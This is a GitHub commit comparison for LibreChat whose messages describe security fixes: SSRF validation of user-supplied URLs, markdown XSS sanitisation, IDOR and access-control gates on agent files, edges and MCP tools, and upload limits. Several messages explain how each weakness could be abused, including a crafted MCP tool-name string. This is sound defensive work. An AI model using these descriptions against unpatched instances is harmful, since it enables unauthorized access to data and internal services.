Compare commits

..

39 commits

Author SHA1 Message Date
Danny Avila
8271055c2d
📦 chore: Bump @librechat/agents to v3.1.56 (#12258)
Some checks are pending
Docker Dev Branch Images Build / build (Dockerfile, lc-dev, node) (push) Waiting to run
Docker Dev Branch Images Build / build (Dockerfile.multi, lc-dev-api, api-build) (push) Waiting to run
Docker Dev Images Build / build (Dockerfile, librechat-dev, node) (push) Waiting to run
Docker Dev Images Build / build (Dockerfile.multi, librechat-dev-api, api-build) (push) Waiting to run
Sync Locize Translations & Create Translation PR / Sync Translation Keys with Locize (push) Waiting to run
Sync Locize Translations & Create Translation PR / Create Translation PR on Version Published (push) Blocked by required conditions
* 📦 chore: Bump `@librechat/agents` to v3.1.56

* chore: resolve type error, URL property check in isMCPDomainAllowed function
2026-03-15 23:51:41 -04:00
Danny Avila
acd07e8085
🗝️ fix: Exempt Admin-Trusted Domains from MCP OAuth Validation (#12255)
Some checks are pending
Docker Dev Branch Images Build / build (Dockerfile, lc-dev, node) (push) Waiting to run
Docker Dev Branch Images Build / build (Dockerfile.multi, lc-dev-api, api-build) (push) Waiting to run
* fix: exempt allowedDomains from MCP OAuth SSRF checks (#12254)

The SSRF guard in validateOAuthUrl was context-blind — it blocked
private/internal OAuth endpoints even for admin-trusted MCP servers
listed in mcpSettings.allowedDomains. Add isHostnameAllowed() to
domain.ts and skip SSRF checks in validateOAuthUrl when the OAuth
endpoint hostname matches an allowed domain.

* refactor: thread allowedDomains through MCP connection stack

Pass allowedDomains from MCPServersRegistry through BasicConnectionOptions,
MCPConnectionFactory, and into MCPOAuthHandler method calls so the OAuth
layer can exempt admin-trusted domains from SSRF validation.

* test: add allowedDomains bypass tests and fix registry mocks

Add isHostnameAllowed unit tests (exact, wildcard, case-insensitive,
private IPs). Add MCPOAuthSecurity tests covering the allowedDomains
bypass for initiateOAuthFlow, refreshOAuthTokens, and revokeOAuthToken.
Update registry mocks to include getAllowedDomains.

* fix: enforce protocol/port constraints in OAuth allowedDomains bypass

Replace isHostnameAllowed (hostname-only check) with isOAuthUrlAllowed
which parses the full OAuth URL and matches against allowedDomains
entries including protocol and explicit port constraints — mirroring
isDomainAllowedCore's allowlist logic. Prevents a port-scoped entry
like 'https://auth.internal:8443' from also exempting other ports.

* test: cover auto-discovery and branch-3 refresh paths with allowedDomains

Add three new integration tests using a real OAuth test server:
- auto-discovered OAuth endpoints allowed when server IP is in allowedDomains
- auto-discovered endpoints rejected when allowedDomains doesn't match
- refreshOAuthTokens branch 3 (no clientInfo/config) with allowedDomains bypass

Also rename describe block from ephemeral issue number to durable name.

* docs: explain intentional absence of allowedDomains in completeOAuthFlow

Prevents future contributors from assuming a missing parameter during
security audits — URLs are pre-validated during initiateOAuthFlow.

* test: update initiateOAuthFlow assertion for allowedDomains parameter

* perf: avoid redundant URL parse for admin-trusted OAuth endpoints

Move isOAuthUrlAllowed check before the hostname extraction so
admin-trusted URLs short-circuit with a single URL parse instead
of two. The hostname extraction (new URL) is now deferred to the
SSRF-check path where it's actually needed.
2026-03-15 23:03:12 -04:00
Danny Avila
8e8fb01d18
🧱 fix: Enforce Agent Access Control on Context and OCR File Loading (#12253)
* 🔏 fix: Apply agent access control filtering to context/OCR resource loading

The context/OCR file path in primeResources fetched files by file_id
without applying filterFilesByAgentAccess, unlike the file_search and
execute_code paths. Add filterFiles dependency injection to primeResources
and invoke it after getFiles to enforce consistent access control.

* fix: Wire filterFilesByAgentAccess into all agent initialization callers

Pass the filterFilesByAgentAccess function from the JS layer into the TS
initializeAgent → primeResources chain via dependency injection, covering
primary, handoff, added-convo, and memory agent init paths.

* test: Add access control filtering tests for primeResources

Cover filterFiles invocation with context/OCR files, verify filtering
rejects inaccessible files, and confirm graceful fallback when filterFiles,
userId, or agentId are absent.

* fix: Guard filterFilesByAgentAccess against ephemeral agent IDs

Ephemeral agents have no DB document, so getAgent returns null and the
access map defaults to all-false, silently blocking all non-owned files.
Short-circuit with isEphemeralAgentId to preserve the pass-through
behavior for inline-built agents (memory, tool agents).

* fix: Clean up resources.ts and JS caller import order

Remove redundant optional chain on req.user.role inside user-guarded
block, update primeResources JSDoc with filterFiles and agentId params,
and reorder JS imports to longest-to-shortest per project conventions.

* test: Strengthen OCR assertion and add filterFiles error-path test

Use toHaveBeenCalledWith for the OCR filtering test to verify exact
arguments after the OCR→context merge step. Add test for filterFiles
rejection to verify graceful degradation (logs error, returns original
tool_resources).

* fix: Correct import order in addedConvo.js and initialize.js

Sort by total line length descending: loadAddedAgent (91) before
filterFilesByAgentAccess (84), loadAgentTools (91) before
filterFilesByAgentAccess (84).

* test: Add unit tests for filterFilesByAgentAccess and hasAccessToFilesViaAgent

Cover every branch in permissions.js: ephemeral agent guard, missing
userId/agentId/files early returns, all-owned short-circuit, mixed
owned + non-owned with VIEW/no-VIEW, agent-not-found fail-closed,
author path scoped to attached files, EDIT gate on delete, DB error
fail-closed, and agent with no tool_resources.

* test: Cover file.user undefined/null in permissions spec

Files with no user field fall into the non-owned path and get run
through hasAccessToFilesViaAgent. Add two cases: attached file with
no user field is returned, unattached file with no user field is
excluded.
2026-03-15 23:02:36 -04:00
Danny Avila
6f87b49df8
🛂 fix: Enforce Actions Capability Gate Across All Event-Driven Tool Loading Paths (#12252)
* fix: gate action tools by actions capability in all code paths

Extract resolveAgentCapabilities helper to eliminate 3x-duplicated
capability resolution. Apply early action-tool filtering in both
loadToolDefinitionsWrapper and loadAgentTools non-definitions path.
Gate loadActionToolsForExecution in loadToolsForExecution behind an
actionsEnabled parameter with a cache-based fallback. Replace the
late capability guard in loadAgentTools with a hasActionTools check
to avoid unnecessary loadActionSets DB calls and duplicate warnings.

* fix: thread actionsEnabled through InitializedAgent type

Add actionsEnabled to the loadTools callback return type,
InitializedAgent, and the initializeAgent destructuring/return
so callers can forward the resolved value to loadToolsForExecution
without redundant getEndpointsConfig cache lookups.

* fix: pass actionsEnabled from callers to loadToolsForExecution

Thread actionsEnabled through the agentToolContexts map in
initialize.js (primary and handoff agents) and through
primaryConfig in the openai.js and responses.js controllers,
avoiding per-tool-call capability re-resolution on the hot path.

* test: add regression tests for action capability gating

Test the real exported functions (resolveAgentCapabilities,
loadAgentTools, loadToolsForExecution) with mocked dependencies
instead of shadow re-implementations. Covers definition filtering,
execution gating, actionsEnabled param forwarding, and fallback
capability resolution.

* test: use Constants.EPHEMERAL_AGENT_ID in ephemeral fallback test

Replaces a string guess with the canonical constant to avoid
fragility if the ephemeral detection heuristic changes.

* fix: populate agentToolContexts for addedConvo parallel agents

After processAddedConvo returns, backfill agentToolContexts for
any agents in agentConfigs not already present, so ON_TOOL_EXECUTE
for added-convo agents receives actionsEnabled instead of falling
back to a per-call cache lookup.
2026-03-15 23:01:36 -04:00
Danny Avila
a26eeea592
🔏 fix: Enforce MCP Server Authorization on Agent Tool Persistence (#12250)
* 🛡️ fix: Validate MCP tool authorization on agent create/update

Agent creation and update accepted arbitrary MCP tool strings without
verifying the user has access to the referenced MCP servers. This allowed
a user to embed unauthorized server names in tool identifiers (e.g.
"anything_mcp_<victimServer>"), causing mcpServerNames to be stored on
the agent and granting consumeOnly access via hasAccessViaAgent().

Adds filterAuthorizedTools() that checks MCP tool strings against the
user's accessible server configs (via getAllServerConfigs) before
persisting. Applied to create, update, and duplicate agent paths.

* 🛡️ fix: Harden MCP tool authorization and add test coverage

Addresses review findings on the MCP agent tool authorization fix:

- Wrap getMCPServersRegistry() in try/catch so uninitialized registry
  gracefully filters all MCP tools instead of causing a 500 (DoS risk)
- Guard revertAgentVersionHandler: filter unauthorized MCP tools after
  reverting to a previous version snapshot
- Preserve existing MCP tools on collaborative updates: only validate
  newly added tools, preventing silent stripping of tools the editing
  user lacks direct access to
- Add audit logging (logger.warn) when MCP tools are rejected
- Refactor to single-pass lazy-fetch (registry queried only on first
  MCP tool encountered)
- Export filterAuthorizedTools for direct unit testing
- Add 18 tests covering: authorized/unauthorized/mixed tools, registry
  unavailable fallback, create/update/duplicate/revert handler paths,
  collaborative update preservation, and mcpServerNames persistence

* test: Add duplicate handler test, use Constants.mcp_delimiter, DB assertions

- N1: Add duplicateAgentHandler integration test verifying unauthorized
  MCP tools are stripped from the cloned agent and mcpServerNames are
  correctly persisted in the database
- N2: Replace all hardcoded '_mcp_' delimiter literals with
  Constants.mcp_delimiter to prevent silent false-positive tests if
  the delimiter value ever changes
- N3: Add DB state assertion to the revert-with-strip test confirming
  persisted tools match the response after unauthorized tools are
  removed

* fix: Enforce exact 2-segment format for MCP tool keys

Reject MCP tool keys with multiple delimiters to prevent
authorization/execution mismatch when `.pop()` vs `split[1]`
extract different server names from the same key.

* fix: Preserve existing MCP tools when registry is unavailable

When the MCP registry is uninitialized (e.g. server restart), existing
tools already persisted on the agent are preserved instead of silently
stripped. New MCP tools are still rejected when the registry cannot
verify them. Applies to duplicate and revert handlers via existingTools
param; update handler already preserves existing tools via its diff logic.
2026-03-15 20:08:34 -04:00
Airam Hernández Hernández
aee1ced817
🪙 fix: Resolve Azure AD Group Overage via OBO Token Exchange for OpenID (#12187)
When Azure AD users belong to 200+ groups, group claims are moved out of
the ID token (overage). The existing resolveGroupsFromOverage() called
Microsoft Graph directly with the app-audience access token, which Graph
rejected (401/403).

Changes:
- Add exchangeTokenForOverage() dedicated OBO exchange with User.Read scope
- Update resolveGroupsFromOverage() to exchange token before Graph call
- Add overage handling to OPENID_ADMIN_ROLE block (was silently failing)
- Share resolved overage groups between required role and admin role checks
- Always resolve via Graph when overage detected (even with partial groups)
- Remove debug-only bypass that forced Graph resolution
- Add tests for OBO exchange, caching, and admin role overage scenarios

Co-authored-by: Airam Hernández Hernández <airam.hernandez@intelequia.com>
2026-03-15 19:09:53 -04:00
Danny Avila
ad08df4db6
🔏 fix: Scope Agent-Author File Access to Attached Files Only (#12251)
* 🛡️ fix: Scope agent-author file access to attached files only

The hasAccessToFilesViaAgent helper short-circuited for agent authors,
granting access to all requested file IDs without verifying they were
attached to the agent's tool_resources. This enabled an IDOR where any
agent author could delete arbitrary files by supplying their agent_id
alongside unrelated file IDs.

Now both the author and non-author paths check file IDs against the
agent's tool_resources before granting access.

* chore: Use Object.values/for...of and add JSDoc in getAttachedFileIds

* test: Add boundary cases for agent file access authorization

- Agent with no tool_resources denies all access (fail-closed)
- Files across multiple resource types are all reachable
- Author + isDelete: true still scopes to attached files only
2026-03-15 18:54:34 -04:00
Danny Avila
f7ab5e645a
🫷 fix: Validate User-Provided Base URL in Endpoint Init (#12248)
* 🛡️ fix: Block SSRF via user-provided baseURL in endpoint initialization

User-provided baseURL values (when endpoint is configured with
`user_provided`) were passed through to the OpenAI SDK without
validation. Combined with `directEndpoint`, this allowed arbitrary
server-side requests to internal/metadata URLs.

Adds `validateEndpointURL` that checks against known SSRF targets
and DNS-resolves hostnames to block private IPs. Applied in both
custom and OpenAI endpoint initialization paths.

* 🧪 test: Add validateEndpointURL SSRF tests

Covers unparseable URLs, localhost, private IPs, link-local/metadata,
internal Docker/K8s hostnames, DNS resolution to private IPs, and
legitimate public URLs.

* 🛡️ fix: Add protocol enforcement and import order fix

- Reject non-HTTP/HTTPS schemes (ftp://, file://, data:, etc.) in
  validateEndpointURL before SSRF hostname checks
- Document DNS rebinding limitation and fail-open semantics in JSDoc
- Fix import order in custom/initialize.ts per project conventions

* 🧪 test: Expand SSRF validation coverage and add initializer integration tests

Unit tests for validateEndpointURL:
- Non-HTTP/HTTPS schemes (ftp, file, data)
- IPv6 loopback, link-local, and unique-local addresses
- .local and .internal TLD hostnames
- DNS fail-open path (lookup failure allows request)

Integration tests for initializeCustom and initializeOpenAI:
- Guard fires when userProvidesURL is true
- Guard skipped when URL is system-defined or falsy
- SSRF rejection propagates and prevents getOpenAIConfig call

* 🐛 fix: Correct broken env restore in OpenAI initialize spec

process.env was captured by reference, not by value, making the
restore closure a no-op. Snapshot individual env keys before mutation
so they can be properly restored after each test.

* 🛡️ fix: Throw structured ErrorTypes for SSRF base URL validation

Replace plain-string Error throws in validateEndpointURL with
JSON-structured errors using type 'invalid_base_url' (matching new
ErrorTypes.INVALID_BASE_URL enum value). This ensures the client-side
Error component can look up a localized message instead of falling
through to the raw-text default.

Changes across workspaces:
- data-provider: add INVALID_BASE_URL to ErrorTypes enum
- packages/api: throwInvalidBaseURL helper emits structured JSON
- client: add errorMessages entry and localization key
- tests: add structured JSON format assertion

* 🧹 refactor: Use ErrorTypes enum key in Error.tsx for consistency

Replace bare string literal 'invalid_base_url' with computed property
[ErrorTypes.INVALID_BASE_URL] to match every other entry in the
errorMessages map.
2026-03-15 18:41:59 -04:00
Danny Avila
f9927f0168
📑 fix: Sanitize Markdown Artifacts (#12249)
* 🛡️ fix: Sanitize markdown artifact rendering to prevent stored XSS

Replace marked-react with react-markdown + remark-gfm for artifact
markdown preview. react-markdown's skipHtml strips raw HTML tags,
and a urlTransform guard blocks javascript: and data: protocol links.

* fix: Update useArtifactProps test to expect react-markdown dependencies

* fix: Harden markdown artifact sanitization

- Convert isSafeUrl from denylist to allowlist (http, https, mailto, tel
  plus relative/anchor URLs); unknown protocols are now fail-closed
- Add remark-breaks to restore single-newline-to-<br> behavior that was
  silently dropped when replacing marked-react
- Export isSafeUrl from the host module and add 16 direct unit tests
  covering allowed protocols, blocked schemes (javascript, data, blob,
  vbscript, file, custom), edge cases (empty, whitespace, mixed case)
- Hoist remarkPlugins to a module-level constant to avoid per-render
  array allocation in the generated Sandpack component
- Fix import order in generated template (shortest to longest per
  AGENTS.md) and remove pre-existing trailing whitespace

* fix: Return null for blocked URLs, add sync-guard comments and test

- urlTransform returns null (not '') for blocked URLs so react-markdown
  omits the href/src attribute entirely instead of producing <a href="">
- Hoist urlTransform to module-level constant alongside remarkPlugins
- Add JSDoc sync-guard comments tying the exported isSafeUrl to its
  template-string mirror, so future maintainers know to update both
- Add synchronization test asserting the embedded isSafeUrl contains the
  same allowlist set, URL parsing, and relative-path checks as the export
2026-03-15 18:40:42 -04:00
Danny Avila
bcf45519bd
🪪 fix: Enforce VIEW ACL on Agent Edge References at Write and Runtime (#12246)
* 🛡️ fix: Enforce ACL checks on handoff edge and added-convo agent loading

Edge-linked agents and added-convo agents were fetched by ID via
getAgent without verifying the requesting user's access permissions.
This allowed an authenticated user to reference another user's private
agent in edges or addedConvo and have it initialized at runtime.

Add checkPermission(VIEW) gate in processAgent before initializing
any handoff agent, and in processAddedConvo for non-ephemeral added
agents. Unauthorized agents are logged and added to skippedAgentIds
so orphaned-edge filtering removes them cleanly.

* 🛡️ fix: Validate edge agent access at agent create/update time

Reject agent create/update requests that reference agents in edges
the requesting user cannot VIEW. This provides early feedback and
prevents storing unauthorized agent references as defense-in-depth
alongside the runtime ACL gate in processAgent.

Add collectEdgeAgentIds utility to extract all unique agent IDs from
an edge array, and validateEdgeAgentAccess helper in the v1 handler.

* 🧪 test: Improve ACL gate test coverage and correctness

- Add processAgent ACL gate tests for initializeClient (skip/allow handoff agents)
- Fix addedConvo.spec.js to mock loadAddedAgent directly instead of getAgent
- Seed permMap with ownedAgent VIEW bits in v1.spec.js update-403 test

* 🧹 chore: Remove redundant addedConvo ACL gate (now in middleware)

PR #12243 moved the addedConvo agent ACL check upstream into
canAccessAgentFromBody middleware, making the runtime check in
processAddedConvo and its spec redundant.

* 🧪 test: Rewrite processAgent ACL test with real DB and minimal mocking

Replace heavy mock-based test (12 mocks, Providers.XAI crash) with
MongoMemoryServer-backed integration test that exercises real getAgent,
checkPermission, and AclEntry — only external I/O (initializeAgent,
ToolService, AgentClient) remains mocked. Load edge utilities directly
from packages/api/src/agents/edges to sidestep the config.ts barrel.

* 🧪 fix: Use requireActual spread for @librechat/agents and @librechat/api mocks

The Providers.XAI crash was caused by mocking @librechat/agents with
a minimal replacement object, breaking the @librechat/api initialization
chain. Match the established pattern from client.test.js and
recordCollectedUsage.spec.js: spread jest.requireActual for both
packages, overriding only the functions under test.
2026-03-15 18:08:57 -04:00
Danny Avila
1312cd757c
🛡️ fix: Validate User-provided URLs for Web Search (#12247)
* 🛡️ fix: SSRF-validate user-provided URLs in web search auth

User-controlled URL fields (jinaApiUrl, firecrawlApiUrl, searxngInstanceUrl)
flow from plugin auth into outbound HTTP requests without validation.
Reuse existing isSSRFTarget/resolveHostnameSSRF to block private/internal
targets while preserving admin-configured (env var) internal URLs.

* 🛡️ fix: Harden web search SSRF validation

- Reject non-HTTP(S) schemes (file://, ftp://, etc.) in isSSRFUrl
- Conditional write: only assign to authResult after SSRF check passes
- Move isUserProvided tracking after SSRF gate to avoid false positives
- Add authenticated assertions for optional-field SSRF blocks in tests
- Add file:// scheme rejection test
- Wrap process.env mutation in try/finally guard
- Add JSDoc + sync-obligation comment on WEB_SEARCH_URL_KEYS

* 🛡️ fix: Correct auth-type reporting for SSRF-stripped optional URLs

SSRF-stripped optional URL fields no longer pollute isUserProvided.
Track whether the field actually contributed to authResult before
crediting it as user-provided, so categories report SYSTEM_DEFINED
when all surviving values match env vars.
2026-03-15 18:05:08 -04:00
Danny Avila
8dc6d60750
🛡️ fix: Enforce MULTI_CONVO and agent ACL checks on addedConvo (#12243)
* 🛡️ fix: Enforce MULTI_CONVO and agent ACL checks on addedConvo

addedConvo.agent_id was passed through to loadAddedAgent without any
permission check, enabling an authenticated user to load and execute
another user's private agent via the parallel multi-convo feature.

The middleware now chains a checkAddedConvoAccess gate after the primary
agent check: when req.body.addedConvo is present it verifies the user
has MULTI_CONVO:USE role permission, and when the addedConvo agent_id is
a real (non-ephemeral) agent it runs the same canAccessResource ACL
check used for the primary agent.

* refactor: Harden addedConvo middleware and avoid duplicate agent fetch

- Convert checkAddedConvoAccess to curried factory matching Express
  middleware signature: (requiredPermission) => (req, res, next)
- Call checkPermission directly for the addedConvo agent instead of
  routing through canAccessResource's tempReq pattern; this avoids
  orphaning the resolved agent document and enables caching it on
  req.resolvedAddedAgent for downstream loadAddedAgent
- Update loadAddedAgent to use req.resolvedAddedAgent when available,
  eliminating a duplicate getAgent DB call per chat request
- Validate addedConvo is a plain object and agent_id is a string
  before passing to isEphemeralAgentId (prevents TypeError on object
  injection, returns 400-equivalent early exit instead of 500)
- Fix JSDoc: "VIEW access" → "same permission as primary agent",
  add @param/@returns to helpers, restore @example on factory
- Fix redundant return await in resolveAgentIdFromBody

* test: Add canAccessAgentFromBody spec covering IDOR fix

26 integration tests using MongoMemoryServer with real models, ACL
entries, and PermissionService — no mocks for core logic.

Covered paths:
- Factory validation (requiredPermission type check)
- Primary agent: missing agent_id, ephemeral, non-agents endpoint
- addedConvo absent / invalid shape (string, array, object injection)
- MULTI_CONVO:USE gate: denied, missing role, ADMIN bypass
- Agent resource ACL: no ACL → 403, insufficient bits → 403,
  nonexistent agent → 404, valid ACL → next + cached on req
- End-to-end: both real agents, primary denied short-circuits,
  ephemeral primary + real addedConvo
2026-03-15 17:12:45 -04:00
Danny Avila
07d0ce4ce9
🪤 fix: Fail-Closed MCP Domain Validation for Unparseable URLs (#12245)
* 🛡️ fix: Fail-closed MCP domain validation for unparseable URLs

`isMCPDomainAllowed` returned true (allow) when `extractMCPServerDomain`
could not parse the URL, treating it identically to a stdio transport.
A URL containing template placeholders or invalid syntax bypassed the
domain allowlist, then `processMCPEnv` resolved it to a valid—and
potentially disallowed—host at connection time.

Distinguish "no URL" (stdio, allowed) from "has URL but unparseable"
(rejected when an allowlist is active) by checking whether `config.url`
is an explicit non-empty string before falling through to the stdio path.

When no allowlist is configured the guard does not fire—unparseable URLs
fall through to connection-level SSRF protection via
`createSSRFSafeUndiciConnect`, preserving legitimate `customUserVars`
template-URL configs.

* test: Expand MCP domain validation coverage for invalid/templated URLs

Cover all branches of the fail-closed guard:
- Invalid/templated URLs rejected when allowlist is configured
- Invalid/templated URLs allowed when no allowlist (null/undefined/[])
- Whitespace-only and empty-string URLs treated as absent across all
  allowedDomains configurations
- Stdio configs (no url property) remain allowed
2026-03-15 17:08:43 -04:00
Danny Avila
a0b4949a05
🛡️ fix: Cover full fe80::/10 link-local range in IPv6 check (#12244)
* 🛡️ fix: Cover full fe80::/10 link-local range in SSRF IPv6 check

The `isPrivateIP` check used `startsWith('fe80')` which only matched
fe80:: but missed fe90::–febf:: (the rest of the RFC 4291 fe80::/10
link-local block). Replace with a proper bitwise hextet check.

* 🛡️ fix: Guard isIPv6LinkLocal against parseInt partial-parse on hostnames

parseInt('fe90.example.com', 16) stops at the dot and returns 0xfe90,
which passes the bitmask check and false-positives legitimate domains.

Add colon-presence guard (IPv6 literals always contain ':') and a hex
regex validation on the first hextet before parseInt.

Also document why fc/fd use startsWith while fe80::/10 needs bitwise.

*  test: Harden IPv6 link-local SSRF tests with false-positive guards

- Assert fe90/fea0/febf hostnames are NOT blocked (regression guard)
- Add feb0::1 and bracket form [fe90::1] to isPrivateIP coverage
- Extend resolveHostnameSSRF tests for fe90::1 and febf::1
2026-03-15 17:07:55 -04:00
Danny Avila
a01959b3d2
🛰️ fix: Cross-Replica Created Event Delivery (#12231)
Some checks are pending
Docker Dev Branch Images Build / build (Dockerfile, lc-dev, node) (push) Waiting to run
Docker Dev Branch Images Build / build (Dockerfile.multi, lc-dev-api, api-build) (push) Waiting to run
* fix: emit created event from metadata on cross-replica subscribe

In multi-instance Redis deployments, the created event (which triggers
sidebar conversation creation) was lost when the SSE subscriber connected
to a different instance than the one generating. The event was only in
the generating instance's local earlyEventBuffer and the Redis pub/sub
message was already gone by the time the subscriber's channel was active.

When subscribing cross-replica (empty buffer, Redis mode, userMessage
already in job metadata), reconstruct and emit the created event
directly from stored metadata.

* test: add skipBufferReplay regression guard for cross-replica created event

Add test asserting the resume path (skipBufferReplay: true) does NOT
emit a created event on cross-replica subscribe — prevents the
duplication fix from PR #12225 from regressing. Add explanatory JSDoc
on the cross-replica fallback branch documenting which fields are
preserved from trackUserMessage() and why sender/isCreatedByUser
are hardcoded.

* refactor: replace as-unknown-as casts with discriminated ServerSentEvent union

Split ServerSentEvent into StreamEvent | CreatedEvent | FinalEvent so
event shapes are statically typed. Removes all as-unknown-as casts in
GenerationJobManager and test file; narrows with proper union members
where properties are accessed.

* fix: await trackUserMessage before PUBLISH for structural ordering

trackUserMessage was fire-and-forget — the HSET for userMessage could
theoretically race with the PUBLISH. Await it so the write commits
before the pub/sub fires, guaranteeing any cross-replica getJob() after
the pub/sub window always finds userMessage in Redis. No-op for
non-created events (early return before any async work).

* refactor: type CreatedEvent.message explicitly, fix JSDoc and import

Give CreatedEvent.message its full known shape instead of
Record<string, unknown>. Update sendEvent JSDoc to reflect the
discriminated union. Use barrel import in test file.

* refactor: type FinalEvent fields with explicit message and conversation shapes

Replace Record<string, unknown> on requestMessage, responseMessage,
conversation, and runMessages with FinalMessageFields and a typed
conversation shape. Captures the known field set used by all final
event constructors (abort handler in GenerationJobManager and normal
completion in request.js) while allowing extension via index signature
for fields contributed by the full TMessage/TConversation schemas.

* refactor: narrow trackUserMessage with discriminated union, disambiguate error fields

Use 'created' in event to narrow ServerSentEvent to CreatedEvent,
eliminating all Record<string, unknown> casts and manual field
assertions. Add JSDoc to the two distinct error fields on
FinalMessageFields and FinalEvent to prevent confusion.

* fix: update cross-replica test to expect created event from metadata

The cross-replica subscribe fallback now correctly emits a created
event reconstructed from persisted metadata when userMessage exists
in the Redis job hash. Replica B receives 4 events (created + 3
deltas) instead of 3.
2026-03-15 11:11:10 -04:00
Danny Avila
e079fc4900
📎 fix: Enforce File Count and Size Limits Across All Attachment Paths (#12239)
* 🐛 fix: Enforce fileLimit and totalSizeLimit in Attached Files panel

The Files side panel (PanelTable) was not checking fileLimit or
totalSizeLimit from fileConfig when attaching previously uploaded files,
allowing users to bypass per-endpoint file count and total size limits.

* 🔧 fix: Address review findings on file limit enforcement

- Fix totalSizeLimit double-counting size of already-attached files
- Clarify fileLimit error message: "File limit reached: N files (endpoint)"
- Replace Array.from(...).reduce with for...of loop to avoid intermediate allocation
- Extract inline `type TFile` into standalone `import type` per project conventions

*  test: Add PanelTable handleFileClick file limit tests

Cover fileLimit guard, totalSizeLimit guard, passing case,
double-count prevention for re-attached files, and boundary case.

* 🔧 test: Harden PanelTable test mock setup

- Use explicit endpoint key matching mockConversation.endpoint
  instead of relying on default fallback behavior
- Add supportedMimeTypes to mock config for explicit MIME coverage
- Throw on missing filename cell in clickFilenameCell to prevent
  silent false-positive blocking assertions

* ♻️ refactor: Align file validation ordering and messaging across upload paths

- Reorder handleFileClick checks to match validateFiles:
  disabled → fileLimit → fileSizeLimit → checkType → totalSizeLimit
- Change fileSizeLimit comparison from > to >= in handleFileClick
  to match validateFiles behavior
- Align validateFiles error strings with localized key wording:
  "File limit reached:", "File size limit exceeded:", etc.
- Remove stray console.log in validateFiles MIME-type check

*  test: Add validateFiles unit tests for both paths' consistency

13 tests covering disabled, empty, fileLimit (reject + boundary),
fileSizeLimit (>= at limit + under limit), checkType, totalSizeLimit
(reject + at limit), duplicate detection, and check ordering.
Ensures both validateFiles and handleFileClick enforce the same
validation rules in the same order.
2026-03-15 10:39:42 -04:00
Danny Avila
93a628d7a2
📎 fix: Respect fileConfig.disabled for Agents Endpoint Upload Button (#12238)
* fix: respect fileConfig.disabled for agents endpoint upload button

The isAgents check was OR'd without the !isUploadDisabled guard,
bypassing the fileConfig.endpoints.agents.disabled setting and
always rendering the attach file menu for agents.

* test: add regression tests for fileConfig.disabled upload guard

Cover the isUploadDisabled rendering gate for agents and assistants
endpoints, preventing silent reintroduction of the bypass bug.

* test: cover disabled fallback chain in useAgentFileConfig

Verify agents-disabled propagates when no provider is set,
when provider has no specific config (agents as fallback),
and that provider-specific enabled overrides agents disabled.
2026-03-15 10:35:44 -04:00
Danny Avila
0c27ad2d55
🛡️ refactor: Scope Action Mutations by Parent Resource Ownership (#12237)
* 🛡️ fix: Scope action mutations by parent resource ownership

Prevent cross-tenant action overwrites by validating that an existing
action's agent_id/assistant_id matches the URL parameter before allowing
updates or deletes. Without this, a user with EDIT access on their own
agent could reference a foreign action_id to hijack another agent's
action record.

* 🛡️ fix: Harden action ownership checks and scope write filters

- Remove && short-circuit that bypassed the guard when agent_id or
  assistant_id was falsy (e.g. assistant-owned actions have no agent_id,
  so the check was skipped entirely on the agents route).
- Include agent_id / assistant_id in the updateAction and deleteAction
  query filters so the DB write itself enforces ownership atomically.
- Log a warning when deleteAction returns null (silent no-op from
  data-integrity mismatch).

* 📝 docs: Update Action model JSDoc to reflect scoped query params

*  test: Add Action ownership scoping tests

Cover update, delete, and cross-type protection scenarios using
MongoMemoryServer to verify that scoped query filters (agent_id,
assistant_id) prevent cross-tenant overwrites and deletions at the
database level.

* 🛡️ fix: Scope updateAction filter in agent duplication handler

* 🐛 fix: Use action metadata domain instead of action_id when duplicating agent actions

The duplicate handler was splitting `action.action_id` by `actionDelimiter`
to extract the domain, but `action_id` is a bare nanoid that doesn't
contain the delimiter. This produced malformed entries in the duplicated
agent's actions array (nanoid_action_newNanoid instead of
domain_action_newNanoid). The domain is available on `action.metadata.domain`.

*  test: Add integration tests for agent duplication action handling

Uses MongoMemoryServer with real Agent and Action models to verify:
- Duplicated actions use metadata.domain (not action_id) for the
  agent actions array entries
- Sensitive metadata fields are stripped from duplicated actions
- Original action documents are not modified
2026-03-15 10:19:29 -04:00
Danny Avila
7c39a45944
🐍 refactor: Normalize Non-Standard Browser MIME Type Aliases in inferMimeType (#12240)
Some checks are pending
Docker Dev Branch Images Build / build (Dockerfile, lc-dev, node) (push) Waiting to run
Docker Dev Branch Images Build / build (Dockerfile.multi, lc-dev-api, api-build) (push) Waiting to run
* 🐛 fix: Normalize non-standard browser MIME types in inferMimeType

macOS Chrome/Firefox report .py files as text/x-python-script instead
of text/x-python, causing client-side validation to reject Python file
uploads. inferMimeType now normalizes known MIME type aliases before
returning, so non-standard variants match the accepted regex patterns.

* 🧪 test: Add tests for MIME type alias normalization in inferMimeType

* 🐛 fix: Restore JSDoc params and make mimeTypeAliases immutable

* 🧪 test: Add checkType integration tests, remove redundant DragDropModal tests
2026-03-14 22:43:18 -04:00
Danny Avila
8318446704
💁 refactor: Better Config UX for MCP STDIO with customUserVars (#12226)
* refactor: Better UX for MCP stdio with Custom User Variables

- Updated the ConnectionsRepository to prevent connections when customUserVars are defined, improving security and access control.
- Modified the MCPServerInspector to skip capabilities fetch when customUserVars are present, streamlining server inspection.
- Added tests to validate connection restrictions with customUserVars, ensuring robust handling of various server configurations.

This change enhances the overall integrity of the connection management process by enforcing stricter rules around custom user variables.

* fix: guard against empty customUserVars and add JSDoc context

- Extract `hasCustomUserVars()` helper to guard against truthy `{}`
  (Zod's `.record().optional()` yields `{}` on empty input, not `undefined`)
- Add JSDoc to `isAllowedToConnectToServer` explaining why customUserVars
  servers are excluded from app-level connections

* test: improve customUserVars test coverage and fixture hygiene

- Add no-connection-provided test for MCPServerInspector (production path)
- Fix test descriptions to match actual fixture values
- Replace real package name with fictional @test/mcp-stdio-server
2026-03-14 21:22:25 -04:00
Danny Avila
7bc793b18d
🌊 fix: Prevent Buffered Event Duplication on SSE Resume Connections (#12225)
Some checks are pending
Docker Dev Branch Images Build / build (Dockerfile, lc-dev, node) (push) Waiting to run
Docker Dev Branch Images Build / build (Dockerfile.multi, lc-dev-api, api-build) (push) Waiting to run
* fix: skipBufferReplay for job resume connections

- Introduced a new option `skipBufferReplay` in the `subscribe` method of `GenerationJobManagerClass` to prevent duplication of events when resuming a connection.
- Updated the logic to conditionally skip replaying buffered events if a sync event has already been sent, enhancing the efficiency of event handling during reconnections.
- Added integration tests to verify the correct behavior of the new option, ensuring that no buffered events are replayed when `skipBufferReplay` is true, while still allowing for normal replay behavior when false.

* refactor: Update GenerationJobManager to handle sync events more efficiently

